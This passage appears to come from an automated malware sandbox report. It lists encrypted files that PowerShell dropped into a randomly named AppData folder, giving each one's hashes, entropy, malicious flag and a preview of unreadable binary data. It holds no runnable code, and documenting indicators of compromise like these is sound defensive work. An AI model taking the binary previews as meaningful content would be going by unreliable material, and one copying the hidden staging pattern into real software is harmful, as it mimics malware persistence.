E.Mv>.o.Y...>.~g...... .1..}.8K..-5.....4......It.z8..1...=.K^.S.].Q1..

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\nkGwMfFOLpJmPKj.bamptKqfLORC Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	110858
Entropy (8bit):	7.998408581472742
Encrypted:	true
SSDEEP:	3072:y3Mqh+8IwIdv8SAoOqtcKnzmxgp810Wb/XEr:+MqU8EdUEtcKi310yXM
MD5:	6623DC8D826A7063176A263C7B075D18
SHA1:	54FE725099345F51175149FA6295709AB715F833
SHA-256:	97685F4DC98EF5A5C70FA2D316ADEDAC4A983544D74AFBD3BC9C4788E21AFEA7
SHA-512:	45230FF364E80BDD309B35DE02E58A2DE429453A8F88500B3D50B137EE2C4EA856349ABFA09BCB4788508707613EDB64BC5E1FF3225FDCD5F8126EBB2B6DB95D
Malicious:	true
Reputation:	unknown
Preview:	O.Gf<.b..G.}.{.M..vu..?....[.@..#.R.6.1..X,D<.Cm%>.q...!S+.l...j..Z.).....vZ....i5.I..W.1....%....r.ZD;(d.iU..XK..e.. .....K...\~.?{mG2%...I..%.F.X..&....IL..........`.?..;h.....K9..W..........c..3i..7.O.ee..^g...q..@/)..g.).v..hA....8H...q..z{).{.:.Eq..d<_2.z.QhV!Vw.....;....Lh._..T..@...Q...S#Y.4..S..5$.......Z.U...EL,8.x.0z.....U...p......}A..UUZ... ..k.=....xD...Q.-p............on...........Dk...{.C<.n.X)0.....w+{.{m.........J.39v.C3n.)g~...G~rx..9Kn.._;;w7cx.%.]..3...Q.HI.J\|xD\|.Z.......2........n.E!..hk........N.N..._.Bi.j...6ux..cVQT.s...$UM.W ..!.y.f(-..,.^.k........hl_....z;.?Tq.R..$..G..k.B..)(P.(..;........p..&.1.cWy ..ze....lC,.s.}#..sV......=._.~N}..F3..K5-.....W.......0lN.a..}T$.x~.O.vV....D....0.....0..my..;&...S...\...........l.>HZ>....K._i...'..C...."H...N.Z.t..a....;A..!..a:.)G}......!MI...]...'0.=^...'....1.....z...5.\|!.=....a@P.r.N4.5..Uf.7...)".l...c...`M86..(.o.......]....y.>9....6N......1....p...e.%.:.l..h.\|.&.9

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\nkpDhrIiVQMtPH.cHkKZLGBSMs Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	140425
Entropy (8bit):	7.99862747346551
Encrypted:	true
SSDEEP:	3072:RpUE9rnCanD7p6UHCsS5ZN/AomLbbRDvAwke20v4kDUVfYOzi:ReArnCMFu5LavbZowkyCfR+
MD5:	2AD8CB9CCAE834227F3E4FCCAFDB58A2
SHA1:	6844AE8EA10AAC7401F306145C0DF7C61FE6B7CC
SHA-256:	19462DF7093B4F9AD246667F73FC7FF6D6CAFA8601778499A8995B9E1E2A901B
SHA-512:	A1A075191314B07096B0A9D91798F92AD1AF22027ED9F3C0D6524FC19AAB9BEA24DF1665A24B9D7460F73AB32543800253422B1BE76766112A80A7D152C0AECB
Malicious:	true
Reputation:	unknown
Preview:	.U....m&....q.L....z..ob...+.W.~.)...&AC8B."...q.=0r.;.W.^s...d.m.p...m.6.{.L].....&.........x..i..1......7.P.c';.=3.4q.5....>.+......c...Oc...j]=.h6...t....E..&...X_..E.8".x...T.#..$..g.Db..~W.........a....p.C.Hx..eG......R...O$@5....j..wks...u.....?.......P.l...,.H...kV..C..9.>B>...=P..H.Te.a..uX.4...%\|Wh....)...JZ.=..";.mHa.....@....b...aS\s;&U.\|Bj.......4...X......;.ID.2..D2!...Y..Kg. .......zRZU.AJ!.jo......&..-.cr.GL.@...%....T......Q.%x.....L......d......L1'..b9.k..)'D%...^~+...Z.+^-.....,..e...M[...q...K.y\|^Sw.7.U.....;&^..k3D.w.9..T>.[....`5).8i5.c.0.5.x6S!E7...+.:.....h..)..2............c.w..G..I....)....O...{)....(7.Q.,...B."...L.xd2.v0.tFN..(.....?3.....mp...9S{x%........W..=..."v........mf.TA.......D..-".2./...b.`.X...SJ0..D....K...e....T..>..w..]..."........f...hi.e..{Yc....f'!..c.3-k.)T.......{uw.....Si.E.w.."P,..;..<...}i4.v..{3;^d..~x6..$I..;.9y.cU0.....{.......v.w....=.4...;\.6.........).O3.r.....]..$.l..@0.G /.....K.._..:.

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\ntvZcLxePw.RfHEMyCGNsYt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	66242
Entropy (8bit):	7.997353676198641
Encrypted:	true
SSDEEP:	1536:dVOniyZrqe3NxpUXm7+2uYC0ST9p+OxvIyBRJ7zs98VYw/iSb:d8pv3NxqAKH+8IyxA983qSb
MD5:	BB89BC44364C649C20A1236534F98CE3
SHA1:	BF1C11BDF871F3B8AAF97E52A7293885A30BF380
SHA-256:	43ECD8CE97C1C31503CECEA826E0E33F932E846C85F406941C33FB1D16F6E5B5
SHA-512:	6778F1FF3A15010ADB7C643449454257BC1C5B02CF2E7BBE39C458824EE24B78CB047BCA9069535D3613DEF2F5D7203BD4DEBFFF865DAFFAC41D26707F472E31
Malicious:	false
Reputation:	unknown
Preview:	D......'N.A..E..a.,m5..+c...].d....p..A.........y.L..Z$.s`.:fNe.h..N.z....0o....xyM....K....._cW.[.D.c.+...~.c.Q.'.....~7.ul..5.w.C .a.z"...$W.8...p.?.o...!..C...0_..Y...^...4z.{?.....%......=.^Y..6I....."^..E...2.....p....n.......P.......Z..........T.M...%.?.[n0v...d.....a.>......;.......\|..&...{/.co.....K0...5.H.`K.-...-i%;.Aw..@D.+.5......VX.+6/Y...........y.\|....WD..F^....A.>WN.)t.w..z...b.S.u..[...pB...x.!..R1.)....[.l.........[.......,p...S.{t....u..Id...%......=.E~./\.%.<.e+.~V.F.X. ...J...%.f6...S...n.(....EW.>...:%..!.....l...!n...5...GX.Ps.h..WQ.xm....`..'...#.5...L-[R...NC0...<..YF'\......kO..Y}V.J.U.DS....[.y.D.j}pFF;..V5wy.')L._.....xa.x.........F......a......@c.t..@..+._...8)fi[.W....6.....D`h..a....\..5.F...........>y...[.x......,......>..[....(Jj+....Iw.0.(.:..^P...+q..wT....Vn.D...Gz.;...=!&...4>..t.0..u./. ...M.3..+...93\|..%R...0.;I...N...,..Uw.Y.!B...)hzd...v.......JD....+...8,....iL.S..A.<....:q....,<.Z.n.fS.d

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\oNUbHycewlGjFJ.rwGuKhvFZEONbqeDHs Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	94825
Entropy (8bit):	7.998293009914505
Encrypted:	true
SSDEEP:	1536:Py0EvcuG3Ii39LtoBLvDADfVjm/ieCajr0EeGHkNLeEijMHNrIIrCaDMO/f4hfJx:q0Evcj9Lcvq4//CajrTeEkN9A6IWMAOz
MD5:	B9DF5ECD99632F7CCFAC465F042DCB4C
SHA1:	14BEEE1DF21009389027377E3F3965CD8FF94573
SHA-256:	A631B9F6470B49A723A7034363B8F77298F0E775342012A3D56D4D644B95A0B1
SHA-512:	7B25E98971D7240D935792BE308EE01CCA7AB45D37551F52149812662EAE94728E3B5D0F4BC8281358028900EB98CF864B501E6726CB4419A07209C8432334BF
Malicious:	true
Reputation:	unknown
Preview:	..s{8.R.<.......`..ral/........q....I.......(....L[.C.!.gE..>k+)#c?e.^.`.[..$....nk..l....z...ou..<.yx.9.....d....O.7D....3...J...i........BD.+...Px%...]h......A...Z.w.n.\|B}M..\|.:l.-.q93.w..a..g..\.c...u.z..Hl..X\|oT.r..C...f.Le.. ........)...'..a..0s. .......7.ih....X......l.=.Rz.....X...f_$......Q.Zs.'....(......l..DL.I..Q\|.f.,.B..t.'~]z........c..&5...x 8L...n..f.f.X...>...a.........]$.8.ub2u..@.Q-Tm..f._n....m..{....J.Sc.H.~.1b.].....6.i...3.Uj..T_......x.{.}.N.I\..XN..Pp\|.....~.KpN........1..<.k..BD...A.~.........P...2>...J...+nI........E.GAh...:..^Oh.....F.6.[.FI!...?.....\|yr_.{T......Dt.E...."...t.?i;n.=D.....}K...........W.....l..0 ...._+SB<6.&.b.0..@.).\|K.O..B.y...P..z..{..j..}..A...:.8._H..orz.iq....ftX..f......0x@..P.28..).....V5.......u9..uIt(..O....j...ve...{bt.........k*.z[/....)-0.....5.=B....)......<......B..K.t.......(.....n....%...b..r..;.)...P.K..6C2.q).......f.K..H~...@....Tf....\|...;..!...c...9..

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\oOSFugyTDUAbH.sxDypWYeKAlmgtLhk Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	186740
Entropy (8bit):	7.999005107578075
Encrypted:	true
SSDEEP:	3072:FfJoKcVuFELKTQ2Mu4J7LMDW/KaHY//0zFScuduF1pyOLlCTBSVeHkCi4FjftqNP:FBoTVuF8MQzgDWJ4//0zFScQM3CTUIN4
MD5:	6998932832708FFF94914F37FFBC3B7A
SHA1:	C464C9338905F1F2519A98AEAECC56EC69B8425C
SHA-256:	69F2D4FE6B1B13559ECF154E80C5DA44AC773FCE962110FC1EC91E6718ADF750
SHA-512:	5D2720E7047964C107E8D372061343DF6C5A601CF5482CD555384DF04EF248F5F36D638DF8602C66B97ABDED4BE6881B2AD18E181A976CABA3C63EA549C970E8
Malicious:	true
Reputation:	unknown
Preview:	H.S..9.&q...? ..R...S.-.....w.....'...u.VFIC!LQ.1....d.d2.<..g.j....M....o_.l.E...u6.o..J9r....xk....".....Ls.rR....."Z1<s.*.....,Ja.).w....o..k".Aw.I...Y~...}w.w(..y."......+...E\.....2.....W..z-.\T....o..K98.h.bB..}!....D.S3y...N...E.....a..u7W..(2..x~S...O....,.....=...Vg..!4?0....A.D.X........R.W.....!.t.....qT..N...G../....Y......6w-4.E...bT..zT......Y..X...Z.Y(..}.....H i...uXD...Z....x.....b.....~.xv....K.....@._.j..Ib\|..x.[.<.Y.',t"c-..^..!..u.'L)f'CL..18.[...S....</<&.......`....xk2.i....%.a....@KX.#.7.q.c.V`..4(..G.LP.(..V..u..q.OTR.A..6.Xm.N-.........Hc[.......T..~...H...b....]..0r..X...<YH....H......+.S2..Y.\|#.>{tk......./.?0.or...,$.....Cd'.s%.~5....D\|C.Z..'.f:ONP..} .{.]..5....=.\|A..nO.s...9..$./..1..[../.5.p..1q.=f.2..$..z....O}.....Y...l./..c..P.....aB.f#5F @.&yUJ..y.G.>..f.L5W...5...R.%l....hC!R.....t^.....q%C}...&... .\|...5_.>)2..qRF...a=..J.M.+..y.T..........J.S...}.y.4.4..4.8.^>N.....2.......W7...BqP..

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\oVPjwIbiShv.YCxQuJWsDcrXhNn Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	198004
Entropy (8bit):	7.999087519109275
Encrypted:	true
SSDEEP:	3072:GySrIpsEcq/pS+XCPopAuvj7JeXt0v33GYecnNkJPW5Yk4Fi96S/7ArszLe8u/5e:5vn3yP3uvj0d0v6MUkuiwS/kAmA
MD5:	66252FB864670D916822EF5D1F65D769
SHA1:	B8B1BEAAA08D00BD42F41FE5DB5E6B39A65A8435
SHA-256:	698DA3A118852676DCC8C9B13A6F82EE76F7F323CCC04E85028BF7BB82E3FBD0
SHA-512:	F277F676868D396916D6A215943EFE53FD37A58E1632C76124837A9A156DDD15BFB035AA906EF9984F93687829A5AE41F915D6FFA6377B8E94DF834827AA4B6D
Malicious:	false
Reputation:	unknown
Preview:	..Xj.f)G@91..V..l~..=.,2.~........O...w..p.....}9....E..%NX.XB.C........d..^F5..T..1.mU......W.^..X^.e......w...S...!..W.K.l._.O.rits....zGp......H..7h.._V....EMO.a.Ax..!Bz...kl.>.JH.;..f{u.....#:..g.p....6%f.U....~.a...bW.[.........8.F.g@...0-.....P.....%.3.a.\....!.n.O....hk-...{i.J.......k...K..QM..s.&7O.k[.......GWM..p.\|.p....S..g2X../1@..#.Nl........6....YVg..%.?...S.....Z.I.s!O.1.!..PU.(q..XF.t...u#....5.Z.4...O<...........~..Xgu.2...t.\B<....V-..wD....3...X....T...Y:..U:)m..daSN..T....U...`....9.z..=.\....Y$;..b...}.]....I....E.....=&.................<.8oo..C....a.....E...b.... ....4V.H.......CZJ:&......{..u.......C.y.V.......y.m.\X..}.... ...>.N..5<._\!.....T.B.jz.^.w..?6.J.H.P..8.............#..>..).~76.......... ...oi......`3p.'..)....HA...BX.t.....~.!JR%W......\...&(.h._BoC.w....x....#.)....U.,)\.........1@...(8P27@.>.....J...y.y....AQ.F..........X.4.>U...1.&U.8Zu......)..P...!.D..ktM_.....9^..\|z0k.....#.....Bz..,t...

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\ovEgjfIUlhNQZmcOxd.UQYfBKaeVLxgXZsqjnm Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	132009
Entropy (8bit):	7.998495563810822
Encrypted:	true
SSDEEP:	3072:z9YhukecwOOUKnAzvAXzlp7gzdjL9jQlJ:hYhPRvo5tgzdjL9KJ
MD5:	73F390A59CA778E98169BC5C47C907CA
SHA1:	BF027AF105C904A189CFE254AB6C43922373A794
SHA-256:	DE5DD3345C665B3AF1F32617C695BBEB9796861404408C39100916BB50E1E085
SHA-512:	DBB3F7AA19038DC866A473CC35B43C01B7D173ADB725AE8CF59B634F04BDFE274E2CCC694A8019D57C2C43BFDE68DC55335D04A1DC7770CB6DC1D8719721EA23
Malicious:	true
Reputation:	unknown
Preview:	=.,.g....c..?......!.....>Dl...N.N.......j.]..8...i..ge....;..Tg...R. b.l.].q.U......2..R..gyG_..f....,...8V.J......o...f.aS.j.6{F~vk.\...f.d....l.U.Z.6..k...J...........9.Qj.....F OH.^.......a"N....`......Y5rb..k.vB...2$...G.....d.DJ...J.m..t.h.h@....-.....<.{.aX.&8..e...s.L..U.0.9..^k......%.Ln.0...0.hRlW~....K{'.f....~.P.}M..p.%.D.....t[........b.'..i....~i.......<..hr.r....th%.z...s.6.........:......i#\|A......j3o......VG......n^.M\|A.d[...F.N.78..)3..!5.x<d....q..Qq.....7...1.d4.D+8p.....<LN+Q.D.D..{.-i #.G...H.^8u.1...!.c....~Q\|.k...Br....<..T.<-..d.Z...Jb9.U...3..3.2...0.....B#.@..U.w.X....)!D......).$....1.^.X...~.<5....`..9.Bg..,.SV..Lj..S..M..XJ....h..L.{.T.,jhZ....+..f.\|..<.5.1.s..h..~......~r...i..\|.m.`.>...8....Q.W..g..].C.t../H...I..?....2.b.>..e....>X.ury.e...)..HYD..F.v.f.f2...._..Hk.oe...`.9...!..@.......G........y."A.t.-...e.KV......Rm~.o....i..H....f..L}...1;h....p..f.-...;. .}...O.d......ga.@.*z.1}#_\|.E3B.&....

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\pMDEzFULNisvn.FXUcnPEdmTuqAhk Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	68688
Entropy (8bit):	7.997393305585033
Encrypted:	true
SSDEEP:	1536:vzNglciyv8aXJjGgMbPBsp+fv26Gv0nbCv2PEPlokIC6Q1bW7o+wL:rNp8QGgYPPfuLgbCv2PQ/6Q1hnL
MD5:	F20B7ED4EEE23381591EF19130C81B20
SHA1:	2E2809F909BDC725A705DC4CEDDF38A41B975DC9
SHA-256:	FCAE5F9028D8489640C6231C31F4D0BB2C34DD119F4C114F0EAB06B079E2BB0A
SHA-512:	2D937C3961FA3F6C20BEFB90953232D8216D3B6B9771CDB59F09712BB15E79E50EDDB2977969D9D829F7881C57335C428DEBC512C802ABC2E3DA1EA05A37EAF8
Malicious:	false
Reputation:	unknown
Preview:	I"..zf#npq.au.....1.."U..X......#...nTpK..=`.k........&..9!..z..>..^.3s.O...24..l.#7....42...rX..o.V........4>.H....#I...@%..{..Z.J..R'....X..\.{.Qo...WD..=w9.)....v.l.....B..1......q...Q.]C.Y.$.4.\....Xn...'.a...&0:iQ.K.A....?.J......6.DvQ.Hog53..I....,......G......^.W.i^.c..}IWZ.F&f.y'9....nI...E...._SZZ.;.O..~h.\|.+.7.iTU];..>.....a....+..5......W}.].U....e[.bz.-.C...k..o..L$..);VHd.\|..r.......Ko`_..OQ..pD..wa.&#8...q.v'.;..e.i.~..xs...axtxAn.p...ZU.fL.../...?!.....>.......q.g..O~(.c+.\...V.5WG.$..cE...K.+I..<........j....W)%...G.9W.}.0....<F.v.~@...&O...#..Te.iyR(.Q..J..Y.....d..A^..-a./.....BJ.7V..........N...X......@_.w65.BX.c..a.....7g....Fk..@..\^;.,X..t...$a..D#;3.....o-.p~....Lg%.qw;t.%G.pt.\........:....J.n.6.....)ZZ..~..e....i..L.:..^......@..\a.0..=6...lb.h..wU.0n....\|Y5.............*.R,0u9....j.=......oL._]z...C.... ...}...~!E....U;I..n.#2......v..K..u.o.<4....._..E........A..RTJ...FC....#.U...l..~......e.u.`....L....

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\pXFwOznfDtTRjKkCrh.eqNkHrzyPIZdDuSmEnR Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	198019
Entropy (8bit):	7.999162529154995
Encrypted:	true
SSDEEP:	6144:KNgZJuF3HnU7ES/6F8Bk/kZBSXa3PnVwzgw3chx:ugnuFA/6FdMYmnTFx
MD5:	C483245E8AF15CBEC7F40667E93BF2C4
SHA1:	6D86FB8A083EA6E37644182FB257F66A34C30BA9
SHA-256:	A72E03A169625985FF46B4B0B74B29430601624893641AD17EEB8BDB37C90C44
SHA-512:	867EAD1F715CC9ACACB40916CCF409A507952D3851C73B5D7506DF39CBF59F895FC625F0E55B489E83C2FE15C0853769A862C804FA9D73EB1E2E88DDAA683AE9
Malicious:	false
Reputation:	unknown
Preview:	.#T....pG.}...e...E...O..I.c.7~.YX.T6\|&@.eB......3....7...i^.....].....X.$.H-.@.......p[N..2..Fd....".'s...e.......#.i..Af..P..._..>.yev........%.3#V$/0?..)".)...%..xz...6..?gf..<.{..C..M._...8c...4.vb.oP.-...O...._.F.._.%..1U.\.+..3.:..c<AW.;&.\:Ty..fxWk...e_R.....+..+(........'!v+j..d.Sb......7?.1(GM.....n..>=.~\|T#gN..sC.......#.......E............i..T...t#..HD........)f5=A..u......}wU0.o\RXw[d.."...tt.....H..6...,H.gEj.....~W....8...^..s&p.j@@.H..c..$.`A..>De.i.............?6f..Z'..u/..15...@.B.H....t).._..{..BY.....>.3h.CO....0..ww..-...p.....0...5:.O.N..\s...)'.f9@.;``.2Z7.y....w.'.......y.....D..[W.....C....8>...~.D.~K.Hr....z..o...%.....?.cW...c...`X.z..F.u-..m..1X....T...t..1......RY...L..b-...$.m.....M...2b....)u&.....S..2~.E.8......!....$..~...v.0.8..Y.N.+\|..e].....l.b....d>...e..H^)..CF.CPS,"...1}fo%....ex..k..\@...(y..ds.[.S..$_#.7..Y.NMc.[O}..i.=..UK.D@^....k.t8.....M.!\|..........B......}..E.T..n]@.*.+.QO..F.~.jo..T...

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\pvwILGNdhfH.wQHRysbFJg Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	107027
Entropy (8bit):	7.9984301962819355
Encrypted:	true
SSDEEP:	3072:Mwc3WGwzL6M2ZWtLt9S5NCq8uKGaW7uhJF9:Mwc3WtWNWtLt9eJK7Wub
MD5:	0D6639CE5894FF00BB01202196A813C2
SHA1:	970DC6630EF425E4EC886584998EE0AAE8D3B39B
SHA-256:	583F29E2B8A88877C40522ABEEBFA101C359E0B5B0C7DBCEB91087CB01B61EF8
SHA-512:	12A88904BD6825F0E993703051B3CB9DFCBEEF763BF077CE303AAC3B456FF2F4F013109DD141169E0C59FAB5D3F07165C84B751B1751DD145625E3CC28E68764
Malicious:	true
Reputation:	unknown
Preview:	...d.(.....k.`o.^...w.\|v.%..M.O.;N...Y......s(%.....6._a.._......V".PH..u.\|....X..9...&J;.!x.T...o...z..k..^}...r..!.pq......(.f...Hk...5F.+.H..V..}..........C..r..(~..A.j..0.+\jF...........u..sj..w..R;......U.o.w...\....'.f..=.l.$..s..........4k.~I....W..... S...@4.z.!K..:.y..y.Q^i..Q.A.\u....,=..W.{....1:.3-.g9.B.1\.y.a;43x.\.d..{.0.[l..".W..V..N...i..Z.c.....W..[.>...V..!.rb..?....... E......,.......nv+...j.LC..[....(.......&..e.u...4m9.S.V......._........;...=R.d.`...{6.)'2.......y....BK..8p..{.:..0.K..w.j..P2.........K7.d.,u...K{....1i.7Jfe.Ft.a......f..K..@....C.I..\|....~...F.....m.e.tt..`.P0...l..p.....i\|.p..p0..I....A.Og...R....BQ.....b]..<."..]..L...M.]z.`.~T..n..../....cQ.4......&..Luh.>n..+5.C..._.DO\J.)5,~_..S..o.I....&..8.../#'..;.N.RK3...T?.F>......(R....;N<l0Q..!W.nR>...H`.r.nqI.m.....?..q.....?.i.o.V...z`6...."s.2Q%^f/..WE.9.C3j...5...]}0..u....`..T?...A.....H>....6&.3.=..8.E..b.Pk..;......\|].9.*...x..M.....a.

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\qLPKijlFQOBnJkcH.nspBrHZmezFqgxSODLG Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	103456
Entropy (8bit):	7.998109020609687
Encrypted:	true
SSDEEP:	1536:WwAT0THoI2NRHUonBWWk6bXHcLJOLhbYQINegiu31uhbn5jkc/CtJXQG0rpXPE:TzodP0onBZbXHBLhbYh7R31gRlxc
MD5:	4B4308E39BC9A5E771D3335668E11513
SHA1:	2D7B6A06318E1C7623E5069D57B79C47A3ABC6BE
SHA-256:	7194CB426151969DE4B853985910873FEE380E172D68D0C5BD09C9117E78AFA9
SHA-512:	B954B1006B654B00ABEE2B12BA361B01D48D5FFFA45487D25DA1F6BB09CE4EF23D2457654295E4BDF91543475A65D02717D3CDB28F32E3BBB2DDB38EB1608439
Malicious:	true
Reputation:	unknown
Preview:	B.MYN.xh..;..g...e5.....q3....r..jO:.-}..?.}...p\..dAn.^V....#j..:......`...&.d.T.....}j...K6.....dW...'..z_.7...].Y...#..L..a.EH..&Q..<....;..m.&z.Z..]....o..@.`..7..o.........&.:?B.q..6%.B.V......6...`Z..p!;./I....r..oTh`_fc.J2..F. .5..W..S.P]H..h...=0...}.&.~..Y."......>~.L....T..(.q....1&k...&.I.q.......x.}.9Y1..@.?.....t!........x..-..TA_..v.^Iw...)...v.._)....S.}_.3...OX.%=s..... ...x.T.6K.~.A....."..Be.Pn..w..."y..+o...Kr....U..S.X..'......k..~R\%i..6>...r.'.!.7\|....k...80G..ISc$0.'ux...w'....39.v<........)f...?..g.X..j....2.w...u...{..y.......#1j..$.mo.Z........{h...Am....]......j.. ....K.@.Dl1.}cu...z.a.C.../.@..D.."..!..Qy.}.4X<)j3.......7fxn..A...d:.UR.........<.r.0.zf~.......\|.E..q.Zx K...b......uMd..%S...8.4m].B.\.T.J...,...7$l!.'....!.Y.R.x..I..d.{K.'I$...Kd.p.............m........\|.xX....'.v..uT.H!.sX,T.s..m5.%.2/.576....*w.F..<..k$.$FYs...<..s._....".z7)..vH.u.W...k.........T...)...t......I.(......6bT.Z~..V.aHj..C-b..C/

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\qcmXPZyUHOLIFMN.excBJLvsNQAZh Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	57141
Entropy (8bit):	7.996771619750997
Encrypted:	true
SSDEEP:	1536:OYNRJ5OfJw5qgzMEd8aJ6Mk5R/yJ2Bs9N0Z3IV:HRJ5WJw5UdaJ6PtywS/0Zs
MD5:	269023BD6AA2B1118218C63101A772B5
SHA1:	8683B81D2C8E29F04111E3AC16E82AC119AB63EF
SHA-256:	37BDC2F44E4C5908CE71F9DAB5A649BA0BBA89D348546EBFE17E309C87C58AE0
SHA-512:	4CB22E118B23ECF760899F048CBE0F89D7E2E9C0DCB7E3A7831385BE6F32296251D1F6CD3165E943778D47DA79CA49D6EFBC8655375EE0B6D7811498F18FC3AE
Malicious:	false
Reputation:	unknown
Preview:	I......L....aF........M.L..)&D.Q.0..m.....'7.....m:X.c.j.Bl..g\|T....k. ..#..%...8.....u$...+.4....Xo..^.L[L..E{$.x.O.J5....+.A...^RE...W.l.].M.ej...a.#.5...V.t..X.6v.\.9W...MF[..U..y.."...@....S~r4.'_=(s.J..B.g.Y...'...@..A......^-..Q ....bw....J ...:/1.Z-..Y...../.I<.C..6`<(..li..."..\|..p...9.....>.?.`.............Q..emn,..n`....+C^..PH....a.....`."?n.?4....@...s<..Kd.>6K....Bz...e.......7.C.}S.K....".1..p..PS0..f.g..sG.r>.R.&.G.....$.<.N....@I.72....g.x.......w..Na....F...d....../[y.$.).gb.d.E.;E...1..\|.T.......f..X...K.6D.0..?&jU)\|..EBTI..:.E....j!.R..EQ5.!7pg_6kXn...:.B...n!..Ha...b...'dC.:.C.g..T.X....Q.OK....]....t.U.b.ik:.ha.....E-..]'#:.+...J].1..Fa....FC....P.3.\....?.{>a....$...rA......mn.S.D...Gl....!..&..5.7f..H.....H......%.k..9q.[...l...k.....5b...........\..7..H...~%..+I=x9.53.I..J-....W..h.g...q."Ucg...$.)...9...G...U..k.G.Q^.....q.!2.h@..a-..^W.....'...7..DQk.8.............<.....jUl......Q.L..K.g.....8..1.

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\rMAYSnNHklQqjcbPpW.RBtrMlOJPWn Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	98067
Entropy (8bit):	7.998097732012638
Encrypted:	true
SSDEEP:	1536:WkaFL8yDBZ1i0ZnwagDyP15+ADlyzU4gOEnuBSDXjkb8AA3T8Cz7zR97G4TMG3xm:NA8QLPf17lyzZJEYC3ICz7l97G4TJ3VG
MD5:	BE1D3DF9E2FCD6F273B6FAED884E0E2D
SHA1:	4E6A3F8EE22D6CA7B03BCF0A06E57E098BA6FA3E
SHA-256:	65E8949BB6EE9D55E9BD9B350002DE91100858AF3329221D08E7FE17D67B4AE3
SHA-512:	ABB4D94872C3EC21E3A4E377396B38423C2DA9A0DF99F4546FC781DD402C094A12465F262FCCE7D259D6D2F477AE21576DFE80FEE460B46EFAC7F6331650EA5B
Malicious:	true
Reputation:	unknown
Preview:	9..?...rBy..@Pa..r...y...=..P...<V...G.p....a..K.O...7..H..>8":j.T.V7..3....>>.>Q......?.B1l.\|.........jB.^.a`V...I...E..N..'E.1).I....J..F..r...mJL......q.06..FdHTU..l.k(?+I...........-As..S....X.\f.b.9.y.mQ(lV....W;.+.P....}w......\|W..e....K.UN.(.-.S1..i.y..x......4...Y._..j..N.mzXQm..=..Y.:..f....F..m...Y)).H.h.z.E.aP...$.....ZZ.4.z.B3..-./C....%..,....H..'9e.hh.....3#..2P..2..<.>....l..._....)}.$..t...vY=..#,...d..j,/.q..... ...k)....4...<.....V....`.Dn.J.....8....5cDO5%.s"`.O.^.....v..~..(.....^.F.h^._..rb.LW...o&.cR...V2....`.TG..j..v.M......t.........R....S..&..n..x.9O.l.%..Y.,..b.V.4.KA....Kn...=..5Qrt..>.}.......DF........KT....f.....x.8....7..^.'E..R...4R(r./...R...}....\G[)A..C...dC...&.8iZ.i...B>..7....H....p.x\|QJl+i....W..J..kl.\|..j.CS..q....z@..Y.....*Y.>.-.....(...7.?.............j)'.3...Y[..q.Wh..../..l...#S........(..y4...n.7......J'.......&.oS....o.y.....V.$$!H}...Z.s{..c.h..-./.....&...5...&..f.L..B......9E

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\rQUaXfHxDYptRmwS.AWeLhmyJrZVqwuG Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	116163
Entropy (8bit):	7.998429334360709
Encrypted:	true
SSDEEP:	3072:o2bz1SuJB/6+MV+hxZdY5E24UgBMundO4vMG7VIe1E0QA:dz1SqpMV+tK5E2+BhdOI7VbQA
MD5:	E85F234D32BEA9570C1C213A110CCDF1
SHA1:	4F72DDB8D3E5BA9001A3CCC1DC6B9C8D5283148C
SHA-256:	52C3250D9B6CF69D0711422DAE4607ED8D358ADE441113C520A05FAB634D1493
SHA-512:	E45B05F113D8BC9BCD437AE2F32AA84A9297208F615A8551634680993ABCB1C1681BB3004FEB3CCC5BCD5163DEA59FC35B60C5EA07D25BEFB2A893C56FD01A12
Malicious:	false
Reputation:	unknown
